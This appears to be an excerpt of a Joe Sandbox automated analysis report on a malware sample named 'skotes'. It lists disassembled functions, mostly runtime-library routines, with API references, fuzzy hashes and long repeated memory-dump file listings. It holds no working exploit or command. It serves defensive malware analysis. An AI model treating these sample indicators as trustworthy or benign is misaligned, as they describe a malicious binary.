Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: A111A331508105ABDB15FF79C885B6A73A9EF41328B24C55AFD06DF342DB75D901CB90

Function 0096D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0096D0A5

Strings

SleepConditionVariableCS, xrefs: 0096D05D
kernel32.dll, xrefs: 0096D04C
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0096D03B
WakeAllConditionVariable, xrefs: 0096D069

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: b8bac4c9e3f45086d016f3b119e6b601d48d8e1ed0b1352e2e1295bbebfde659
Instruction ID: 3c7eeae76e17ba731b2d7ea7bd68ee3964d4662b8a13a1daeab93fcdd41847d0
Opcode Fuzzy Hash: b8bac4c9e3f45086d016f3b119e6b601d48d8e1ed0b1352e2e1295bbebfde659
Instruction Fuzzy Hash: A401A261F87712ADBA312BB56E45F6B31CD9BC3B6CF061115F810E3290DEA0DC0354A1

Function 00994C14 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00994C98
__alloca_probe_16.LIBCMT ref: 00994D5E
__freea.LIBCMT ref: 00994DCA

Part of subcall function 0098B04B: RtlAllocateHeap.NTDLL(00000000,031FA665,?,?,0096D3FC,031FA665,?,00967A8B,?,?,?,?,?,?,00957465,?), ref: 0098B07E

__freea.LIBCMT ref: 00994DD3
__freea.LIBCMT ref: 00994DF6

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 5c097bd003389768295c9d486d4d61368e9e768c4fbc4b376c27df11d2b6b7cf
Instruction ID: 64bdfa70215cd4511f82874d93168583c272e058a0367c28fce5afb9a4e6d60e
Opcode Fuzzy Hash: 5c097bd003389768295c9d486d4d61368e9e768c4fbc4b376c27df11d2b6b7cf
Instruction Fuzzy Hash: C151D276600206AFEF265F68DC41FBB36ADDB85754F190529FD14A7280EB35EC1287A0

Function 0097E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0097E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0097E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0097E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0097E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0097E9DC

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: dfc44c4948c6f081d1c967ce7470dd0a2090e7ee0796fa70bfd24388f4479513
Instruction ID: 4ec63957d7c266887a4c70a22360014259220f3f916da0ad584350b54c4f8315
Opcode Fuzzy Hash: dfc44c4948c6f081d1c967ce7470dd0a2090e7ee0796fa70bfd24388f4479513
Instruction Fuzzy Hash: 62413D76A00619EBCB49DF64C554BADB7B6BF88310F048199E91AA7390CB74AE01CB81

Function 0096ECE6 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0096ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0096ED17

Part of subcall function 0096F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0096F3FA

__alloca_probe_16.LIBCMT ref: 0096ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0096ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0096EDC6

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
String ID:
API String ID: 2568206803-0
Opcode ID: a27f89e62bf6b1dfbfb58af25dc7f24d7f5ff84146b45394355f296ca4ab63a4
Instruction ID: e732a986889d26dbfedefa74c8e6ed6dc4da88af580d578f4e61b27ec59203af
Opcode Fuzzy Hash: a27f89e62bf6b1dfbfb58af25dc7f24d7f5ff84146b45394355f296ca4ab63a4
Instruction Fuzzy Hash: 6531AF79E002058BCF15DFA8C9516AEB7F8EF49310F24406AE815EB390DB349E02CBA4

Function 0097D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0097D344
ListArray.LIBCONCRT ref: 0097D367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0097D370
ListArray.LIBCONCRT ref: 0097D3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0097D3B3

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
